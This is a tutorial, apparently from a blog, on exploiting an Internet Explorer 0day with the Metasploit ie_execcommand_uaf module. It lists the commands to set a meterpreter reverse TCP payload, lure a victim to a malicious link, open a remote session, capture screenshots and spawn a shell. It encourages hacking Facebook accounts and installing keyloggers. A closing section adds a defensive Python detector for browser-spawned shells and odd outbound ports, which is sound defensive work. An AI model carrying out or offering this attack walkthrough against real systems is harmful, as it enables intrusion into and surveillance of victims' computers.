Exploiting the Internet Explorer 0day vulnerability with Metasploit

A new security flaw has just been discovered in Internet Explorer. It is a 0day, and exploiting it lets an attacker obtain a remote connection to the victim's machine. Internet Explorer versions 6 through 9 are affected; version 10 is not.

We wonder how long it will take Microsoft to release a patch, given that more than 32% of Internet users use Internet Explorer.

In the meantime, we'll see how to exploit this flaw with the Metasploit Framework.

The module that exploits this flaw is called "ie_execcommand_uaf".

Here are the commands to use in Metasploit (here, is the hacker's server, i.e. you):

msf> svn up (to update Metasploit)
msf> use exploit/windows/browser/ie_execcommand_uaf
msf> set payload windows/meterpreter/reverse_tcp

Here, we load the "reverse_tcp" payload. This piece of shellcode is executed on the target machine once the vulnerability has been exploited. A reverse TCP connection is then initiated from the target back to you, which lets you open a remote session (even through a firewall, since the connection is outbound from the victim).

msf> set lhost
msf> set srvhost
msf> set uripath games (this is the URL used for the exploit)

With the module correctly configured, we can launch the attack:

msf> exploit
[*] Started reverse handler on
[*] Using URL:

A temporary web server is then started. You must now send the address of the page to a victim. When he or she clicks on the link, Metasploit will tell you something like this:

All we have to do now is open a remote session on the machine with the command:

msf> sessions -i 1
[*] Starting interaction with 1

Now you can do whatever you want, such as take a screenshot of the desktop:

meterpreter> use espia
Loading extension espia ... success.
meterpreter> screenshot capture.bmp

Or open a command prompt (MS-DOS window):

meterpreter> shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Ahmed\Desktop>

Or hack a Facebook account. In short, we can really do whatever we want on the system (turn off the PC, set up a keylogger ...).
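From the defender's side, the session above gives away two things endpoint telemetry can catch: iexplore.exe spawning cmd.exe ("Process 892 created") and the browser opening an outbound connection to an attacker-chosen port for the reverse TCP payload. The script below is an added example, not part of the original post or of Metasploit; it runs over constructed Sysmon-style process-creation and network-connection records (field names, paths, PIDs, addresses and the port are assumed sample values) and flags both behaviours.

```python
import ntpath

# Browsers that have no business launching a command interpreter.
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
# Interpreters a compromised browser is typically made to spawn (the post's session spawns cmd.exe).
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Ports a browser is expected to talk to; anything else from a browser deserves a look.
WEB_PORTS = {80, 443, 8080}

# Constructed Sysmon-style records (EventID 1 = process creation, 3 = network connection).
# Paths, PIDs, addresses and the port are made-up sample values, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 1204, "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\WINDOWS\explorer.exe", "CommandLine": "iexplore.exe http://example.invalid/games"},
    {"EventID": 3, "ProcessId": 1204, "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "DestinationIp": "192.0.2.10", "DestinationPort": 4444},
    {"EventID": 1, "ProcessId": 892, "Image": r"C:\WINDOWS\system32\cmd.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe", "CommandLine": "cmd.exe"},
    {"EventID": 1, "ProcessId": 1500, "Image": r"C:\WINDOWS\system32\notepad.exe",
     "ParentImage": r"C:\WINDOWS\explorer.exe", "CommandLine": "notepad.exe"},
    {"EventID": 3, "ProcessId": 1204, "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "DestinationIp": "192.0.2.20", "DestinationPort": 443},
]

def image_name(path):
    """Lower-cased executable name from a Windows path."""
    return ntpath.basename(path).lower()

def browser_spawned_shells(events):
    """Process-creation events where a browser is the parent of a shell or script host."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        parent, child = image_name(ev.get("ParentImage", "")), image_name(ev.get("Image", ""))
        if parent in BROWSERS and child in SHELLS:
            hits.append((ev["ProcessId"], parent, child))
    return hits

def browser_non_web_egress(events):
    """Network-connection events where a browser reaches a port outside the usual web ports."""
    return [(ev["ProcessId"], ev["DestinationIp"], ev["DestinationPort"])
            for ev in events
            if ev.get("EventID") == 3
            and image_name(ev.get("Image", "")) in BROWSERS
            and ev.get("DestinationPort") not in WEB_PORTS]

if __name__ == "__main__":
    for pid, parent, child in browser_spawned_shells(SAMPLE_EVENTS):
        print(f"ALERT pid={pid}: {parent} spawned {child}")
    for pid, ip, port in browser_non_web_egress(SAMPLE_EVENTS):
        print(f"ALERT pid={pid}: browser connected to {ip}:{port}")
```

Both rules are coarse on purpose; in production you would tune the port allow-list per environment and correlate the two events by ProcessId to raise confidence.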